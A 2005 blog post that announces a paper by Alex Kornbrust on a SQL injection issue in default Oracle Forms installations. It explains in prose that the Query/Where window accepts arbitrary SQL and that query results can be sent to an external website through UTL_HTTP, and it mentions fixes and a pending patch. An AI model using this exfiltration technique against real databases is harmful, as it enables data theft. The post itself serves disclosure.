[Previous entry: "O'Reilly CodeZoo"] [Next entry: "Frank talks about the OWASP security conference"]
Alex Kornbrust has released a new paper "SQL Injection in Oracle Forms"
April 12th, 2005 by Pete
Post to del.icio.us
Post to Furl
I just got an email from Alex to let me know that he has just released a new paper called "SQL Injection in Oracle Forms" that talks about a SQL Injection issue that is inherent in all default installations of Oracle Forms. This is because it is possible to simply pop up a "Query/Where" window that allows the user to enter any SQL statement. Alex demonstrates how this can be used to send results of a query to an external website using UTL_HTTP. Alex also talks about simple fixes to rectify the problem.
The paper is also available in German.
This issue should be fixed in CPU April 12 due very soon!
